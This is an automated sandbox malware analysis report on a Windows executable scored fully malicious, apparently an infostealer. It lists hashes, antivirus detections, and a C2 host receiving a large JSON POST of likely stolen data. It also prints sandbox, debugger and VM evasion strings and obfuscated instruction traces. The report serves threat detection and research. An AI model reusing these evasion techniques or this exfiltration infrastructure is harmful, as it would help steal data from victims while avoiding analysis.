Windows Analysis Report
A3nofpjN9A.exe

Overview

General Information

Sample name: A3nofpjN9A.exe (renamed because the original name is a hash value)
Original sample name: 2115e3fbda695f11af734c24ee699e6d.exe
Analysis ID: 1581601
MD5: 2115e3fbda695f11af734c24ee699e6d
SHA1: 334ace427d9b4e6a95ea977e31c8060c3e3eb54c
SHA256: a782e6fb792b210e82802ac312542a670a37f4668031418875db91a4c9dfd5be
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • A3nofpjN9A.exe (PID: 5620 cmdline: "C:\Users\user\Desktop\A3nofpjN9A.exe" MD5: 2115E3FBDA695F11AF734C24EE699E6D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: A3nofpjN9A.exe | Avira: detected
Source: A3nofpjN9A.exe | ReversingLabs: Detection: 60%
Source: A3nofpjN9A.exe | Virustotal: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: A3nofpjN9A.exe | Joe Sandbox ML: detected
Source: A3nofpjN9A.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_0043A5B0
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_0043A7F0
Source: A3nofpjN9A.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses | 0_2_003D255D
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle | 0_2_003D29FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 444274
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 143 Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 81.29.149.125
Source: Joe Sandbox View | IP Address: 3.218.7.103
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_0049A8C0 recvfrom | 0_2_0049A8C0
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 444274
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: A3nofpjN9A.exe, 00000000.00000002.2204472447.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204245896.0000000001789000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000003.2169724733.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169437946.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204540533.0000000001800000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169602744.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170003230.00000000017FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=
Source: A3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: A3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204245896.0000000001789000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862u
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: A3nofpjN9A.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: A3nofpjN9A.exe | Static PE information: section name:
Source: A3nofpjN9A.exe | Static PE information: section name: .idata
Source: A3nofpjN9A.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_3_0180650F | 0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003E05B0 | 0_2_003E05B0
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003E6FA0 | 0_2_003E6FA0
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_0040F100 | 0_2_0040F100
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_0049B180 | 0_2_0049B180
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_0075E050 | 0_2_0075E050
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_0075A000 | 0_2_0075A000
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_004A00E0 | 0_2_004A00E0
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_00436210 | 0_2_00436210
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_0049C320 | 0_2_0049C320
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_00724410 | 0_2_00724410
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_004A0420 | 0_2_004A0420
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003DE620 | 0_2_003DE620
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_0049C770 | 0_2_0049C770
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_00736730 | 0_2_00736730
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_0043A7F0 | 0_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_00754780 | 0_2_00754780
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: String function: 004150A0 appears 38 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: String function: 00414FD0 appears 77 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: String function: 003D75A0 appears 183 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: String function: 003D73F0 appears 45 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: String function: 00414F40 appears 118 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: String function: 00587220 appears 31 times
Source: A3nofpjN9A.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: A3nofpjN9A.exe | Static PE information: Section: jqefefdt ZLIB complexity 0.9944594236209335
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses | 0_2_003D255D
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_2_003D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle | 0_2_003D29FF
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: A3nofpjN9A.exe | ReversingLabs: Detection: 60%
Source: A3nofpjN9A.exe | Virustotal: Detection: 44%
Source: A3nofpjN9A.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: A3nofpjN9A.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Section loaded: kernel.appcore.dll
Source: A3nofpjN9A.exe | Static file information: File size 4482048 > 1048576
Source: A3nofpjN9A.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: A3nofpjN9A.exe | Static PE information: Raw size of jqefefdt is bigger than: 0x100000 < 0x1b9e00

Data Obfuscation

Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Unpacked PE file: 0.2.A3nofpjN9A.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jqefefdt:EW;rpjpprvb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jqefefdt:EW;rpjpprvb:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: A3nofpjN9A.exe | Static PE information: real checksum: 0x44acae should be: 0x44f8f5
Source: A3nofpjN9A.exe | Static PE information: section name:
Source: A3nofpjN9A.exe | Static PE information: section name: .idata
Source: A3nofpjN9A.exe | Static PE information: section name:
Source: A3nofpjN9A.exe | Static PE information: section name: jqefefdt
Source: A3nofpjN9A.exe | Static PE information: section name: rpjpprvb
Source: A3nofpjN9A.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_3_0180CE80 push 000180D0h; iretd | 0_3_0180CEF5
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_3_0180E09A pushad ; ret | 0_3_0180E0E1
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_3_017FA548 push eax; ret | 0_3_017FA551
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_3_0180E2DA push ss; ret | 0_3_0180E351
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Code function: 0_3_0180CDE0 push 000180D0h; iretd | 0_3_0180CEF5
Source: A3nofpjN9A.exe | Static PE information: section name: jqefefdt entropy: 7.955450902362483

Boot Survival

Source: C:\Users\user\Desktop\A3nofpjN9A.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\A3nofpjN9A.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\A3nofpjN9A.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\A3nofpjN9A.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\A3nofpjN9A.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\A3nofpjN9A.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\A3nofpjN9A.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C66104 second address: C66109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C652E1 second address: C652E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C65E5A second address: C65E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C66BFF second address: C66C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C66C04 second address: C66C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6894D second address: C68975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007F5FC0E77A1Ah 0x0000000b pushad 0x0000000c jbe 00007F5FC0E77A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C68975 second address: C68986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F5FC0CE52C6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C197BE second address: C197C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C197C2 second address: C197C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6AE94 second address: C6AE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6AE98 second address: C6AE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6B43E second address: C6B458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6D423 second address: C6D428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6C649 second address: C6C64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6C64F second address: C6C653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E329 second address: C6E32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E32D second address: C6E33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E33A second address: C6E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E33F second address: C6E35A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E35A second address: C6E3B4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5FC0E77A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push ecx 0x0000000e mov edi, esi 0x00000010 pop ebx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F5FC0E77A08h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F5FC0E77A08h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 stc 0x0000004a push eax 0x0000004b push ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6F312 second address: C6F316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714C0 second address: C714C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714C4 second address: C714C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714C9 second address: C714F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a js 00007F5FC0E77A0Ch 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+12452226h], edx 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+124524C3h] 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714F6 second address: C714FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714FA second address: C71512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C725F2 second address: C72611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5FC0CE52D7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C756BE second address: C756D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7391B second address: C73924 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7486A second address: C74870 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
